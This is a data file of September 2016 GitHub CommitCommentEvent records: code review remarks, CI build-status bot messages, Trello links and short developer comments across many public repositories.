{"id":"4567148763","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033265,"position":null,"line":null,"path":null,"commit_id":"a061547198251d7f33bb47d67c3b2c14b36d58ec","created_at":"2016-09-15T09:59:51Z","updated_at":"2016-09-15T09:59:51Z","body":"Commit involontaire ?"}},"created_at":"2016-09-15T09:59:51Z"}
{"id":"4571480018","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19046620,"position":null,"line":null,"path":null,"commit_id":"a7a0a23b07bbdca2a48725ae76129558280b018e","created_at":"2016-09-16T00:00:28Z","updated_at":"2016-09-16T00:00:28Z","body":"Related to: backdrop/backdrop-issues#1918 backdrop/backdrop-issues#1918 backdrop/backdrop-issues#1918 backdrop/backdrop-issues#1918 "}},"created_at":"2016-09-16T00:00:28Z"}
{"id":"4571482009","type":"CommitCommentEvent","actor":{"login":"stevex86"},"repo":{"name":"tforrest/soda-automation"},"payload":{"comment":{"id":19046631,"position":null,"line":null,"path":null,"commit_id":"6e773da1d585c240b5ba48d46f1506a7145ae389","created_at":"2016-09-16T00:01:03Z","updated_at":"2016-09-16T00:01:03Z","body":"# I'll give you points for modularity"}},"created_at":"2016-09-16T00:01:03Z"}
{"id":"4571482876","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19046633,"position":null,"line":null,"path":null,"commit_id":"50606722091f844d3652f40d6af0b286ccd33c40","created_at":"2016-09-16T00:01:18Z","updated_at":"2016-09-16T00:01:18Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T00:01:18Z"}
{"id":"4571485733","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19046640,"position":18,"line":55,"path":"src/content/guide/getting-started/intro.md","commit_id":"8c744a08b9ef6e950b124802d92b6cbe7fd8f2b1","created_at":"2016-09-16T00:02:11Z","updated_at":"2016-09-16T00:02:11Z","body":"to the Particle cloud"}},"created_at":"2016-09-16T00:02:11Z"}
{"id":"4571487803","type":"CommitCommentEvent","actor":{"login":"waj"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19046645,"position":null,"line":null,"path":null,"commit_id":"611849c8bbb01d94d7b668675f5a916a9a75bcaf","created_at":"2016-09-16T00:02:47Z","updated_at":"2016-09-16T00:02:47Z","body":"Yay! 😉"}},"created_at":"2016-09-16T00:02:47Z"}
{"id":"4571490081","type":"CommitCommentEvent","actor":{"login":"vitagrrl"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-uyenuong"},"payload":{"comment":{"id":19046647,"position":null,"line":null,"path":null,"commit_id":"5643c757d08273209e56e2d50d9ea14d71518159","created_at":"2016-09-16T00:03:25Z","updated_at":"2016-09-16T00:03:25Z","body":"This is starting to look good.  I think a simple texture would help it read a little more clearly. \r\n\r\nSome notes:\r\non the first drop the clementine should rotate to the right and not to the left.  Also in the graph editor the drop should have a steeper slope.  That would make the drop a bit faster.  On the first bounce it doesn't feel like it hits the ground. Add an extra frame between the clementine about to hit the ground and recovering.  in the extra frame squish the clementine.  Keep an eye on if the clementine is rotating in the right direction.   The settle gives it a lot of character.  Really pay attention to the first two bounces.  Look in the graph editor at the curves and clean them up. Make sure that there aren't any jitters in the slope. "}},"created_at":"2016-09-16T00:03:25Z"}
{"id":"4571500401","type":"CommitCommentEvent","actor":{"login":"timb320"},"repo":{"name":"timb320/hello-world"},"payload":{"comment":{"id":19046663,"position":3,"line":3,"path":"README.md","commit_id":"ecb1d80cf77b6e0ae5811c38bd51587ab4c45147","created_at":"2016-09-16T00:06:39Z","updated_at":"2016-09-16T00:06:39Z","body":"what next"}},"created_at":"2016-09-16T00:06:39Z"}
{"id":"4571502338","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19046666,"position":95,"line":2162,"path":"commands.js","commit_id":"28c0a2a22c8522e8889d97ff6c6cbdc99cfb17a8","created_at":"2016-09-16T00:07:18Z","updated_at":"2016-09-16T00:07:18Z","body":"I prefer this way, tbh. Clearer and stops making me uneasy about `this` binding."}},"created_at":"2016-09-16T00:07:18Z"}
{"id":"4571505509","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"Khenu/sfdat26_work"},"payload":{"comment":{"id":19046678,"position":null,"line":null,"path":null,"commit_id":"f7d7883225277d5033a6deb69e9a808ceb68f1b7","created_at":"2016-09-16T00:08:15Z","updated_at":"2016-09-16T00:08:15Z","body":"Businesses\r\n\r\n- # 4 - value_counts() sorts by values. You can use inspections.groupby('month').size().plot(kind=\"bar\")\r\n- # 6 - alternatively, you can use this to see the distribution: restaurant_scores[restaurant_scores.type == 'New Ownership'].risk_category.value_counts(normalize=True)\r\n- # 8 - value_counts() counts the number of times a specific instance of the Score appears. To look at the distribution, you can use a histogram without that: restaurant_scores.Score.hist(bins=10)\r\n\r\nMorbid\r\n\r\n- # 7 - to print a percentage, you can use \"{0:.2f}%\".format(a*100)\r\n- #11 - You can make your histograms more readable by adding figsize = (12,8)\r\n\r\nLess Morbid\r\n- # 8 - You could try this: majors['Median'].hist(by=majors['Major_category'], sharex = True, sharey = True, figsize=(15,10))\r\n- # 10 - You could also try this: majors[['major','unemployment_rate']].sort_values(by='unemployment_rate', ascending=False).Major.head(10)"}},"created_at":"2016-09-16T00:08:15Z"}
{"id":"4571506754","type":"CommitCommentEvent","actor":{"login":"mcifani"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":19046683,"position":null,"line":null,"path":null,"commit_id":"39ca60b5fb3c1a4a4d820232419dd9036e95ffb0","created_at":"2016-09-16T00:08:38Z","updated_at":"2016-09-16T00:08:38Z","body":"Here's a light solution for now so we display a user's \"comments\" when clicking on an end users comment tab, which is more expected behavior.  I'm doing an additional refactor later which will also change the route, _steemit.com/@user/comments_ to improve the path and keep things more uniform. "}},"created_at":"2016-09-16T00:08:38Z"}
{"id":"4571507054","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19046684,"position":null,"line":null,"path":null,"commit_id":"875a71810a5b73314546155836df9475718370e3","created_at":"2016-09-16T00:08:42Z","updated_at":"2016-09-16T00:08:42Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/483/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-16T00:08:42Z"}
{"id":"4571510291","type":"CommitCommentEvent","actor":{"login":"czpython"},"repo":{"name":"divio/djangocms-text-ckeditor"},"payload":{"comment":{"id":19046693,"position":null,"line":null,"path":null,"commit_id":"84a6c0aa842a5d71b168bdb70036f6cb546438ae","created_at":"2016-09-16T00:09:49Z","updated_at":"2016-09-16T00:09:49Z","body":"Yes, 3.2.1 has fixed this and other issues."}},"created_at":"2016-09-16T00:09:49Z"}
{"id":"4571518845","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":19046706,"position":6,"line":87,"path":"app/controllers/kaui/admin_tenants_controller.rb","commit_id":"c63b55d58a4fe9634eca35db14b800ea0d70f2bc","created_at":"2016-09-16T00:12:24Z","updated_at":"2016-09-16T00:12:24Z","body":"Extra `puts`."}},"created_at":"2016-09-16T00:12:24Z"}
{"id":"4571525745","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19046717,"position":null,"line":null,"path":null,"commit_id":"c7a335894b3f06761fa939ddae7b606e878e06b6","created_at":"2016-09-16T00:14:43Z","updated_at":"2016-09-16T00:14:43Z","body":"Related to: backdrop/backdrop-issues#1918 backdrop/backdrop-issues#1918 backdrop/backdrop-issues#1918 backdrop/backdrop-issues#1918 "}},"created_at":"2016-09-16T00:14:43Z"}
{"id":"4571529604","type":"CommitCommentEvent","actor":{"login":"gortonz"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":19046723,"position":null,"line":null,"path":null,"commit_id":"ec63bdd48ef28f47b7347ab52d626ed3e1f22748","created_at":"2016-09-16T00:15:56Z","updated_at":"2016-09-16T00:15:56Z","body":"In rails, the difference =>  _resource_or_scope vs resource_or_scope?"}},"created_at":"2016-09-16T00:15:56Z"}
{"id":"4571530530","type":"CommitCommentEvent","actor":{"login":"iApplepet"},"repo":{"name":"CP1406-2016-2/orchestra-cp1406-2016-team24"},"payload":{"comment":{"id":19046726,"position":null,"line":null,"path":null,"commit_id":"2db9115c98c43a5f27fc99f6f232ce152b641a13","created_at":"2016-09-16T00:16:14Z","updated_at":"2016-09-16T00:16:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;E8ItIyjE&#x2F;1-project-plan\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Project Plan</a>"}},"created_at":"2016-09-16T00:16:14Z"}
{"id":"4571531320","type":"CommitCommentEvent","actor":{"login":"pershik"},"repo":{"name":"privet-team/minijava-compiler"},"payload":{"comment":{"id":19046732,"position":15,"line":15,"path":"pcj/grammar/ExecutionContext.h","commit_id":"e1ea13687388412ab3567119ba0838a6e5fb9b14","created_at":"2016-09-16T00:16:29Z","updated_at":"2016-09-16T00:16:29Z","body":"Comment isn't consistent with function signature ('returns' part)"}},"created_at":"2016-09-16T00:16:29Z"}
{"id":"4571534153","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19046734,"position":13,"line":60,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"cfe7240ba0d1751b99312a3a47aeb6ed984b8a31","created_at":"2016-09-16T00:17:24Z","updated_at":"2016-09-16T00:17:24Z","body":"this is done now"}},"created_at":"2016-09-16T00:17:24Z"}
{"id":"4571536824","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19046740,"position":null,"line":null,"path":null,"commit_id":"3d442c4b95cbdd7ddabdc10c3cfb5ca3865a9535","created_at":"2016-09-16T00:18:15Z","updated_at":"2016-09-16T00:18:15Z","body":"Make sure you test this and manufacture that many this high of a number could break things 1000000"}},"created_at":"2016-09-16T00:18:15Z"}
{"id":"4571538133","type":"CommitCommentEvent","actor":{"login":"tmm1"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19046743,"position":null,"line":null,"path":null,"commit_id":"cfb2b14ddce37c3a1c388748e6aaa897ce99923e","created_at":"2016-09-16T00:18:44Z","updated_at":"2016-09-16T00:18:44Z","body":"New-line separated json is a commonly used format as documented here: http://jsonlines.org\r\n\r\nI often deal with heaps that contain millions of objects, and would not want to load entire dump into memory as a single array/hash."}},"created_at":"2016-09-16T00:18:44Z"}
{"id":"4571539227","type":"CommitCommentEvent","actor":{"login":"remotevase"},"repo":{"name":"ImagicalGamer/SurvivalGames"},"payload":{"comment":{"id":19046744,"position":null,"line":null,"path":null,"commit_id":"6e129e7a5569ae8d4d65c987c142531a5f56be70","created_at":"2016-09-16T00:19:07Z","updated_at":"2016-09-16T00:19:07Z","body":"lol thanks; CAN't wait for UltimateRanks to be in the top survivalgames plugin for PE!!!"}},"created_at":"2016-09-16T00:19:07Z"}
{"id":"4571540748","type":"CommitCommentEvent","actor":{"login":"3vivekb"},"repo":{"name":"vta/modeify"},"payload":{"comment":{"id":19046746,"position":null,"line":null,"path":null,"commit_id":"209d8276d20d2fa93e80ac4108fca4e0b104d530","created_at":"2016-09-16T00:19:39Z","updated_at":"2016-09-16T00:19:39Z","body":"I shouldn't have committed this to master."}},"created_at":"2016-09-16T00:19:39Z"}
{"id":"4571541007","type":"CommitCommentEvent","actor":{"login":"jlokes"},"repo":{"name":"jlokes/hello-world"},"payload":{"comment":{"id":19046748,"position":null,"line":null,"path":null,"commit_id":"bb66b4794d5d8ea41fcb8cb77a7ebec68f2b972c","created_at":"2016-09-16T00:19:45Z","updated_at":"2016-09-16T00:19:45Z","body":"sdfasdf"}},"created_at":"2016-09-16T00:19:45Z"}
{"id":"4571541432","type":"CommitCommentEvent","actor":{"login":"Awallace4"},"repo":{"name":"blockergriffin/weirdSite"},"payload":{"comment":{"id":19046749,"position":null,"line":null,"path":null,"commit_id":"29c0023f2c97949fdc6ea85c34e845ab319ae9e2","created_at":"2016-09-16T00:19:54Z","updated_at":"2016-09-16T00:19:54Z","body":"kek farts"}},"created_at":"2016-09-16T00:19:54Z"}
{"id":"4571542218","type":"CommitCommentEvent","actor":{"login":"kYroL01"},"repo":{"name":"ntop/nDPI"},"payload":{"comment":{"id":19046750,"position":null,"line":null,"path":null,"commit_id":"dbb3d8280ea2a5a5697ad8133973838451ef1d6d","created_at":"2016-09-16T00:20:11Z","updated_at":"2016-09-16T00:20:11Z","body":"https://msdn.microsoft.com/en-us/library/dd304523.aspx"}},"created_at":"2016-09-16T00:20:11Z"}
{"id":"4571550794","type":"CommitCommentEvent","actor":{"login":"zhenxiao"},"repo":{"name":"prestodb/presto"},"payload":{"comment":{"id":19046772,"position":35,"line":451,"path":"presto-hive/src/main/java/com/facebook/presto/hive/parquet/ParquetHiveRecordCursor.java","commit_id":"bf88119adcb7891e1c05022445f43846b1e8906b","created_at":"2016-09-16T00:23:00Z","updated_at":"2016-09-16T00:23:00Z","body":"offsets should be computed no matter whether predicate pushdown is enabled\r\nor, this will produce wrong result when predicatePushdownEnabled=true\r\nFix in https://github.com/prestodb/presto/pull/6127\r\n@nezihyigitbasi @dain "}},"created_at":"2016-09-16T00:23:00Z"}
{"id":"4571550903","type":"CommitCommentEvent","actor":{"login":"jailson-dias"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19046773,"position":20,"line":59,"path":"core/templates/base.html","commit_id":"4dc3a1374e717e3fe9be7be890befe52bf3c055f","created_at":"2016-09-16T00:23:03Z","updated_at":"2016-09-16T00:23:03Z","body":"Lembrar de colocar essa parte com um scroll, pois quando tem muitas notificações elas ficam tomando a tela toda como nessa [imagem](http://www.cin.ufpe.br/~jcd2/imagens/Notifica%e7%f5es.png)"}},"created_at":"2016-09-16T00:23:03Z"}
{"id":"4571553927","type":"CommitCommentEvent","actor":{"login":"ditoledosilva"},"repo":{"name":"Juanpa08/hello-world"},"payload":{"comment":{"id":19046781,"position":null,"line":null,"path":null,"commit_id":"c02134add93bf41b68e5b10a1d8b94d8198b1e31","created_at":"2016-09-16T00:24:04Z","updated_at":"2016-09-16T00:24:04Z","body":"HOLA CHICAS\r\n"}},"created_at":"2016-09-16T00:24:04Z"}
{"id":"4571560856","type":"CommitCommentEvent","actor":{"login":"Hongbo-Miao"},"repo":{"name":"angular/universal-starter"},"payload":{"comment":{"id":19046793,"position":null,"line":null,"path":null,"commit_id":"51448ecfdc8a894a8b846ea56ddc02ed6546d3bd","created_at":"2016-09-16T00:26:29Z","updated_at":"2016-09-16T00:26:29Z","body":"wow, this is amazing, the code is just like front end!"}},"created_at":"2016-09-16T00:26:29Z"}
{"id":"4571578011","type":"CommitCommentEvent","actor":{"login":"mmxe"},"repo":{"name":"ellisware/adapter"},"payload":{"comment":{"id":19046866,"position":null,"line":null,"path":null,"commit_id":"73f80d9008530059709296d35d80a25d91a3ce87","created_at":"2016-09-16T00:32:31Z","updated_at":"2016-09-16T00:32:31Z","body":"Hi again.\r\nI pulled all your changes into my repo and then added your Linux compatibility changes from your blog onto a \"linux-compat\" branch I created. I also make some CMake files and added the two files from the Fanuc CD, so it's easy now to git clone, checkout the linux-compat branch and build. I need to test it a little more next week."}},"created_at":"2016-09-16T00:32:31Z"}
{"id":"4571578978","type":"CommitCommentEvent","actor":{"login":"reitermarkus"},"repo":{"name":"caskroom/homebrew-cask"},"payload":{"comment":{"id":19046870,"position":10,"line":7,"path":"Casks/corectl-app.rb","commit_id":"5463d6f70424053f9068b885f2e5be8f18c5dedf","created_at":"2016-09-16T00:32:51Z","updated_at":"2016-09-16T00:32:51Z","body":"@adidalal, didn't Travis also complain about this?"}},"created_at":"2016-09-16T00:32:51Z"}
{"id":"4571587655","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"endless-sky/endless-sky.github.io"},"payload":{"comment":{"id":19046887,"position":null,"line":null,"path":null,"commit_id":"e3b7c3542d8788c23dd9ad4f1f6e93390eae4be5","created_at":"2016-09-16T00:35:59Z","updated_at":"2016-09-16T00:35:59Z","body":"The biggest thing would be to find a clean way of allowing each mod to specify a list of screenshots, and to page through them if you bring up the details on the mod. (Ideally, that could work the same way the screenshots page on the main website works.)\r\n\r\nSomeone also ought to take a look at the relative benefits of JSON files vs. Jekyll files vs. just editing a data structure in a Javascript. In any case eventually it would be great if the game only has to pull down a single web page (script or HTML) to get all the information it needs on the available mods.\r\n\r\nMy plan for how to do the mods was to embed the metadata in [data-* attributes](http://www.w3schools.com/tags/att_global_data.asp) generated from Jekyll data and embedded directly into the HTML file of the mods gallery, to speed up load times by limiting the number of separate files that have to be retrieved. But I have no idea if that would actually be the best way of doing it or not."}},"created_at":"2016-09-16T00:35:59Z"}
{"id":"4571592748","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19046904,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T00:37:44Z","updated_at":"2016-09-16T00:37:44Z","body":"@AirwavesMan Try increasing the height from `+.1` to `+.5`. Let me know if that fixes it. I didn't get the chance to load up Napf or Tavi to test yet. "}},"created_at":"2016-09-16T00:37:44Z"}
{"id":"4571594531","type":"CommitCommentEvent","actor":{"login":"aoaoratri"},"repo":{"name":"openaddresses/pyesridump"},"payload":{"comment":{"id":19046905,"position":10,"line":32,"path":"esridump/esri2geojson.py","commit_id":"37290509a433d42b93846912b1b5ef9077136a8d","created_at":"2016-09-16T00:38:23Z","updated_at":"2016-09-16T00:38:23Z","body":"60"}},"created_at":"2016-09-16T00:38:23Z"}
{"id":"4571596289","type":"CommitCommentEvent","actor":{"login":"mateus111"},"repo":{"name":"jamacedo/aula-cv"},"payload":{"comment":{"id":19046908,"position":4,"line":2,"path":"README.md","commit_id":"0bb5eeebe024c08b60fa6084bff018fdd1cc185a","created_at":"2016-09-16T00:38:58Z","updated_at":"2016-09-16T00:38:58Z","body":"mateus"}},"created_at":"2016-09-16T00:38:58Z"}
{"id":"4571596562","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19046909,"position":null,"line":null,"path":null,"commit_id":"50606722091f844d3652f40d6af0b286ccd33c40","created_at":"2016-09-16T00:39:04Z","updated_at":"2016-09-16T00:39:04Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50606722091f844d3652f40d6af0b286ccd33c40-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-16T00:39:04Z"}
{"id":"4571597271","type":"CommitCommentEvent","actor":{"login":"adidalal"},"repo":{"name":"caskroom/homebrew-cask"},"payload":{"comment":{"id":19046910,"position":10,"line":7,"path":"Casks/corectl-app.rb","commit_id":"5463d6f70424053f9068b885f2e5be8f18c5dedf","created_at":"2016-09-16T00:39:18Z","updated_at":"2016-09-16T00:39:18Z","body":"Just fixed, https://github.com/caskroom/homebrew-cask/pull/24534 (forgot it when using prfixmaster)"}},"created_at":"2016-09-16T00:39:18Z"}
{"id":"4571597781","type":"CommitCommentEvent","actor":{"login":"mateus111"},"repo":{"name":"jamacedo/aula-cv"},"payload":{"comment":{"id":19046911,"position":null,"line":null,"path":null,"commit_id":"0bb5eeebe024c08b60fa6084bff018fdd1cc185a","created_at":"2016-09-16T00:39:29Z","updated_at":"2016-09-16T00:39:29Z","body":"mateus testando.."}},"created_at":"2016-09-16T00:39:29Z"}
{"id":"4571598583","type":"CommitCommentEvent","actor":{"login":"javajohnHub"},"repo":{"name":"DBa2016/PokemonGo-Bot"},"payload":{"comment":{"id":19046914,"position":null,"line":null,"path":null,"commit_id":"9c560c3a8860861790ea207970fdf6ca923a1d54","created_at":"2016-09-16T00:39:48Z","updated_at":"2016-09-16T00:39:48Z","body":"I do not know the code well enough to confirm. But could this commit have caused all pokemon to be considered vip?"}},"created_at":"2016-09-16T00:39:48Z"}
{"id":"4571599218","type":"CommitCommentEvent","actor":{"login":"moskupols"},"repo":{"name":"privet-team/minijava-compiler"},"payload":{"comment":{"id":19046917,"position":15,"line":15,"path":"pcj/grammar/ExecutionContext.h","commit_id":"e1ea13687388412ab3567119ba0838a6e5fb9b14","created_at":"2016-09-16T00:40:02Z","updated_at":"2016-09-16T00:40:02Z","body":"Indeed."}},"created_at":"2016-09-16T00:40:02Z"}
{"id":"4571605275","type":"CommitCommentEvent","actor":{"login":"Frank-auckland"},"repo":{"name":"tdbt1985/SERLER"},"payload":{"comment":{"id":19046925,"position":null,"line":null,"path":null,"commit_id":"4fdd4c8e27f0182592150db8d4425dc729b30ec2","created_at":"2016-09-16T00:42:16Z","updated_at":"2016-09-16T00:42:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;FhDsOfVE&#x2F;22-us-1-1-research-design\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> US 1.1: Research Design</a>"}},"created_at":"2016-09-16T00:42:16Z"}
{"id":"4571612135","type":"CommitCommentEvent","actor":{"login":"Dog2puppy"},"repo":{"name":"LuaMine/LuaMine"},"payload":{"comment":{"id":19046947,"position":null,"line":null,"path":null,"commit_id":"72c8e79488ea193d7220e44fe917ced1d0fb74f4","created_at":"2016-09-16T00:45:00Z","updated_at":"2016-09-16T00:45:00Z","body":"Fixes print issues to complete Print Functions in #5 "}},"created_at":"2016-09-16T00:45:00Z"}
{"id":"4571614671","type":"CommitCommentEvent","actor":{"login":"OptimisticDong"},"repo":{"name":"OptimisticDong/OptimisticDong.github.io"},"payload":{"comment":{"id":19046953,"position":null,"line":null,"path":null,"commit_id":"33e55b6317a82c5116b9ea88b9c0dfd21f867f14","created_at":"2016-09-16T00:45:56Z","updated_at":"2016-09-16T00:45:56Z","body":"再次修改字体"}},"created_at":"2016-09-16T00:45:56Z"}
{"id":"4571614672","type":"CommitCommentEvent","actor":{"login":"cgutman"},"repo":{"name":"d3m3vilurr/moonlight-common-c"},"payload":{"comment":{"id":19046954,"position":4,"line":396,"path":"src/InputStream.c","commit_id":"8322ce4d91184438b18df0cc4334fede30773496","created_at":"2016-09-16T00:45:56Z","updated_at":"2016-09-16T00:45:56Z","body":"I should have commented this in the code, but that shutdownTcpSocket() call needs to be before PltJoinThread() because it's responsible for waking the thread up that may be waiting in a recv()."}},"created_at":"2016-09-16T00:45:56Z"}
{"id":"4571615159","type":"CommitCommentEvent","actor":{"login":"cgutman"},"repo":{"name":"d3m3vilurr/moonlight-common-c"},"payload":{"comment":{"id":19046957,"position":5,"line":167,"path":"src/VideoStream.c","commit_id":"8322ce4d91184438b18df0cc4334fede30773496","created_at":"2016-09-16T00:46:08Z","updated_at":"2016-09-16T00:46:08Z","body":"Same here too."}},"created_at":"2016-09-16T00:46:08Z"}
{"id":"4571615826","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19046958,"position":null,"line":null,"path":null,"commit_id":"3d442c4b95cbdd7ddabdc10c3cfb5ca3865a9535","created_at":"2016-09-16T00:46:22Z","updated_at":"2016-09-16T00:46:22Z","body":"yup, running test now"}},"created_at":"2016-09-16T00:46:22Z"}
{"id":"4571619495","type":"CommitCommentEvent","actor":{"login":"citrusui"},"repo":{"name":"2363web/2363web.github.io"},"payload":{"comment":{"id":19046969,"position":null,"line":null,"path":null,"commit_id":"6b19880a8a3a724202f8c24e2ec38d6901a05a91","created_at":"2016-09-16T00:47:47Z","updated_at":"2016-09-16T00:47:47Z","body":"Something broke the image loading with this commit, can't figure out why."}},"created_at":"2016-09-16T00:47:47Z"}
{"id":"4571621469","type":"CommitCommentEvent","actor":{"login":"jakeadams"},"repo":{"name":"facebook/ios-snapshot-test-case"},"payload":{"comment":{"id":19046973,"position":null,"line":null,"path":null,"commit_id":"b48e77e3397298baf1532a8e4f418197df2843c3","created_at":"2016-09-16T00:48:29Z","updated_at":"2016-09-16T00:48:29Z","body":"Are there plans to tag this for a release? We're not in a position to go all the way to 3.0 yet."}},"created_at":"2016-09-16T00:48:29Z"}
{"id":"4571623485","type":"CommitCommentEvent","actor":{"login":"gaisei"},"repo":{"name":"gaisei/hotel"},"payload":{"comment":{"id":19046979,"position":10,"line":10,"path":"page.php","commit_id":"67bd45a086db25d80f54bf17a767f5e6e1a8c567","created_at":"2016-09-16T00:49:13Z","updated_at":"2016-09-16T00:49:13Z","body":"`<h1 class=\"type-A\"><?php the_title(); ?></h1>`\r\n\r\nこうじゃなかろうか。"}},"created_at":"2016-09-16T00:49:13Z"}
{"id":"4571623792","type":"CommitCommentEvent","actor":{"login":"pdshaw"},"repo":{"name":"VoltDB/voltdb"},"payload":{"comment":{"id":19046981,"position":28,"line":28,"path":"tests/test_apps/kafkaimporter/custom_import_formatter/formatter/ExampleFormatter.java","commit_id":"8087bfa7c4f1f65dc82dfcc9ebfaece648cbf25a","created_at":"2016-09-16T00:49:19Z","updated_at":"2016-09-16T00:49:19Z","body":"Let's look at the current code. It's changed but your point might still be relevant."}},"created_at":"2016-09-16T00:49:19Z"}
{"id":"4571624600","type":"CommitCommentEvent","actor":{"login":"LeoCandido"},"repo":{"name":"LeoCandido/sonoro"},"payload":{"comment":{"id":19046984,"position":null,"line":null,"path":null,"commit_id":"7ac24b6a9cb9af1cd2602023f44f7c424c0fc177","created_at":"2016-09-16T00:49:37Z","updated_at":"2016-09-16T00:49:37Z","body":"Início do Projeto"}},"created_at":"2016-09-16T00:49:37Z"}
{"id":"4571624731","type":"CommitCommentEvent","actor":{"login":"DemonWav"},"repo":{"name":"DemonWav/MinecraftDevIntelliJ"},"payload":{"comment":{"id":19046985,"position":10,"line":10,"path":"src/main/java/com/demonwav/mcdev/update/Channels.java","commit_id":"d9efde22047f66bf5df940c12a2a8d5ab6f62939","created_at":"2016-09-16T00:49:40Z","updated_at":"2016-09-16T00:49:40Z","body":"\"SCOTLIN\" is just a joke."}},"created_at":"2016-09-16T00:49:40Z"}
{"id":"4571625205","type":"CommitCommentEvent","actor":{"login":"citrusui"},"repo":{"name":"2363web/2363web.github.io"},"payload":{"comment":{"id":19046987,"position":null,"line":null,"path":null,"commit_id":"6b19880a8a3a724202f8c24e2ec38d6901a05a91","created_at":"2016-09-16T00:49:51Z","updated_at":"2016-09-16T00:49:51Z","body":"@skyset please help"}},"created_at":"2016-09-16T00:49:51Z"}
{"id":"4571625527","type":"CommitCommentEvent","actor":{"login":"pdshaw"},"repo":{"name":"VoltDB/voltdb"},"payload":{"comment":{"id":19046989,"position":30,"line":30,"path":"tests/test_apps/kafkaimporter/custom_import_formatter/formatter/ExampleFormatter.java","commit_id":"8087bfa7c4f1f65dc82dfcc9ebfaece648cbf25a","created_at":"2016-09-16T00:49:57Z","updated_at":"2016-09-16T00:49:57Z","body":"That's in there now, with variable randomness, which might be ok or not...."}},"created_at":"2016-09-16T00:49:57Z"}
{"id":"4571629239","type":"CommitCommentEvent","actor":{"login":"zensh"},"repo":{"name":"trekjs/middleware"},"payload":{"comment":{"id":19047000,"position":null,"line":null,"path":null,"commit_id":"d8780976892a4a6412d9d4d74046d840fb657b0a","created_at":"2016-09-16T00:51:22Z","updated_at":"2016-09-16T00:51:22Z","body":"我只是觉得 iterator 在这里没有任何意义，实际上它是不可以被`for of`迭代的。还是 no-iterator 版本合理"}},"created_at":"2016-09-16T00:51:22Z"}
